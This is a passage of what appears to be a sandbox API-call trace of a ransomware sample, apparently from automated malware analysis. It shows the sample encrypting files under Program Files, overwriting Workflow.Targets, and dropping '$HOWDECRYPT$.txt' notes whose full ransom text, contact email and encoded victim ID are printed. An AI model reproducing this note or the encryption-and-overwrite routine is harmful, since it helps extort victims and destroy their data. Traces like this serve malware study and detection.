lpNumberOfBytesWritten=0x270e818, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e818*=0x2ac, lpOverlapped=0x0) returned 1 [0162.278] CloseHandle (hObject=0x178) returned 1 [0162.282] GetProcessHeap () returned 0x2c0000 [0162.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7ecc0 | out: hHeap=0x2c0000) returned 1 [0162.282] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7b8 | out: pbBuffer=0x270e7b8) returned 1 [0162.282] GetProcessHeap () returned 0x2c0000 [0162.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.282] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e7b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e7b0*=0x30) returned 1 [0162.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\wordpad.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.303] GetProcessHeap () returned 0x2c0000 [0162.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.303] GetProcessHeap () returned 0x2c0000 [0162.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c845b0 | out: hHeap=0x2c0000) returned 1 [0162.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.305] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.305] WriteFile (in: hFile=0x178, lpBuffer=0x270e6e7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e810, lpOverlapped=0x0 | out: lpBuffer=0x270e6e7*, lpNumberOfBytesWritten=0x270e810*=0x127, lpOverlapped=0x0) returned 1 [0162.306] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.306] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e810, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e810*=0x2ac, lpOverlapped=0x0) returned 1 [0162.306] CloseHandle (hObject=0x178) returned 1 [0162.306] GetProcessHeap () returned 0x2c0000 [0162.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeb948 | out: hHeap=0x2c0000) returned 1 [0162.306] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7b0 | out: pbBuffer=0x270e7b0) returned 1 [0162.306] GetProcessHeap () returned 0x2c0000 [0162.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.306] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e7a8*=0x30) returned 1 [0162.306] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\renderingcontrol.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.315] GetProcessHeap () returned 0x2c0000 [0162.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.315] GetProcessHeap () returned 0x2c0000 [0162.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecf370 | out: hHeap=0x2c0000) returned 1 [0162.315] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7a8 | out: pbBuffer=0x270e7a8) returned 1 [0162.315] GetProcessHeap () returned 0x2c0000 [0162.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.315] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e7a0*=0x30) returned 1 [0162.315] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpnssci.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.318] GetProcessHeap () returned 0x2c0000 [0162.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.318] GetProcessHeap () returned 0x2c0000 [0162.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e7b0 | out: hHeap=0x2c0000) returned 1 [0162.318] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7a8 | out: pbBuffer=0x270e7a8) returned 1 [0162.318] GetProcessHeap () returned 0x2c0000 [0162.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.318] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e7a0*=0x30) returned 1 [0162.318] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmlaunch.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.326] GetProcessHeap () returned 0x2c0000 [0162.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.326] GetProcessHeap () returned 0x2c0000 [0162.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e528 | out: hHeap=0x2c0000) returned 1 [0162.326] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7a0 | out: pbBuffer=0x270e7a0) returned 1 [0162.326] GetProcessHeap () returned 0x2c0000 [0162.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.326] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e798*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e798*=0x30) returned 1 [0162.326] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabimp.dll" (normalized: "c:\\program files (x86)\\windows mail\\wabimp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.330] GetProcessHeap () returned 0x2c0000 [0162.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.330] GetProcessHeap () returned 0x2c0000 [0162.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebee00 | out: hHeap=0x2c0000) returned 1 [0162.330] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7a0 | out: pbBuffer=0x270e7a0) returned 1 [0162.330] GetProcessHeap () returned 0x2c0000 [0162.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.330] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e798*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e798*=0x30) returned 1 [0162.330] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll" (normalized: "c:\\program files (x86)\\windows mail\\msoeres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.333] GetProcessHeap () returned 0x2c0000 [0162.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.333] GetProcessHeap () returned 0x2c0000 [0162.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebeca0 | out: hHeap=0x2c0000) returned 1 [0162.333] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e798 | out: pbBuffer=0x270e798) returned 1 [0162.334] GetProcessHeap () returned 0x2c0000 [0162.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.334] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e790*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e790*=0x30) returned 1 [0162.334] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\msoeres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.392] GetProcessHeap () returned 0x2c0000 [0162.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.392] GetProcessHeap () returned 0x2c0000 [0162.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5f88 | out: hHeap=0x2c0000) returned 1 [0162.392] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e798 | out: pbBuffer=0x270e798) returned 1 [0162.392] GetProcessHeap () returned 0x2c0000 [0162.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.392] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e790*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e790*=0x30) returned 1 [0162.392] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\reachframework.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.392] GetProcessHeap () returned 0x2c0000 [0162.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.392] GetProcessHeap () returned 0x2c0000 [0162.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaddb8 | out: hHeap=0x2c0000) returned 1 [0162.392] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e790 | out: pbBuffer=0x270e790) returned 1 [0162.392] GetProcessHeap () returned 0x2c0000 [0162.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.392] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e788*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e788*=0x30) returned 1 [0162.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.royale.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.393] GetProcessHeap () returned 0x2c0000 [0162.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.393] GetProcessHeap () returned 0x2c0000 [0162.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eace38 | out: hHeap=0x2c0000) returned 1 [0162.393] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e790 | out: pbBuffer=0x270e790) returned 1 [0162.393] GetProcessHeap () returned 0x2c0000 [0162.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.393] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e788*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e788*=0x30) returned 1 [0162.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.luna.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.393] GetProcessHeap () returned 0x2c0000 [0162.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.393] GetProcessHeap () returned 0x2c0000 [0162.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec89e8 | out: hHeap=0x2c0000) returned 1 [0162.393] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e788 | out: pbBuffer=0x270e788) returned 1 [0162.393] GetProcessHeap () returned 0x2c0000 [0162.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.394] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e780*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e780*=0x30) returned 1 [0162.394] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.394] GetProcessHeap () returned 0x2c0000 [0162.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.394] GetProcessHeap () returned 0x2c0000 [0162.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec88d0 | out: hHeap=0x2c0000) returned 1 [0162.394] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e788 | out: pbBuffer=0x270e788) returned 1 [0162.394] GetProcessHeap () returned 0x2c0000 [0162.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.394] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e780*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e780*=0x30) returned 1 [0162.394] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.classic.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.394] GetProcessHeap () returned 0x2c0000 [0162.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.394] GetProcessHeap () returned 0x2c0000 [0162.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eacd10 | out: hHeap=0x2c0000) returned 1 [0162.394] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e780 | out: pbBuffer=0x270e780) returned 1 [0162.395] GetProcessHeap () returned 0x2c0000 [0162.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.395] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e778*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e778*=0x30) returned 1 [0162.395] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.aero.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.395] GetProcessHeap () returned 0x2c0000 [0162.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.395] GetProcessHeap () returned 0x2c0000 [0162.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec87b8 | out: hHeap=0x2c0000) returned 1 [0162.395] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e780 | out: pbBuffer=0x270e780) returned 1 [0162.395] GetProcessHeap () returned 0x2c0000 [0162.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.395] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e778*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e778*=0x30) returned 1 [0162.395] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationcore.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.395] GetProcessHeap () returned 0x2c0000 [0162.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.395] GetProcessHeap () returned 0x2c0000 [0162.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaa3f8 | out: hHeap=0x2c0000) returned 1 [0162.396] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e778 | out: pbBuffer=0x270e778) returned 1 [0162.396] GetProcessHeap () returned 0x2c0000 [0162.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.396] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e770*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e770*=0x30) returned 1 [0162.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationbuildtasks.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.396] GetProcessHeap () returned 0x2c0000 [0162.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.396] GetProcessHeap () returned 0x2c0000 [0162.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec86a0 | out: hHeap=0x2c0000) returned 1 [0162.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\msbuild\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.535] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.535] WriteFile (in: hFile=0x178, lpBuffer=0x270e6ab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e7d4, lpOverlapped=0x0 | out: lpBuffer=0x270e6ab*, lpNumberOfBytesWritten=0x270e7d4*=0x127, lpOverlapped=0x0) returned 1 [0162.536] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.536] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e7d4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e7d4*=0x2ac, lpOverlapped=0x0) returned 1 [0162.536] CloseHandle (hObject=0x178) returned 1 [0162.536] GetProcessHeap () returned 0x2c0000 [0162.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe9e0 | out: hHeap=0x2c0000) returned 1 [0162.536] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e770 | out: pbBuffer=0x270e770) returned 1 [0162.536] GetProcessHeap () returned 0x2c0000 [0162.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.536] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e768*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e768*=0x30) returned 1 [0162.537] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.632] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets") returned 94 [0162.632] StrStrW (lpFirst="Workflow.Targets", lpSrch=".txt") returned 0x0 [0162.632] GetProcessHeap () returned 0x2c0000 [0162.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0162.632] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e72c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e72c*=0x1276, lpOverlapped=0x0) returned 1 [0162.633] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffed8a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.633] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1276, lpNumberOfBytesWritten=0x270e72c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e72c*=0x1276, lpOverlapped=0x0) returned 1 [0162.634] GetProcessHeap () returned 0x2c0000 [0162.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0162.634] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.634] WriteFile (in: hFile=0x178, lpBuffer=0x270e76c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e72c, lpOverlapped=0x0 | out: lpBuffer=0x270e76c*, lpNumberOfBytesWritten=0x270e72c*=0x4, lpOverlapped=0x0) returned 1 [0162.634] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e72c, lpOverlapped=0x0 | out: 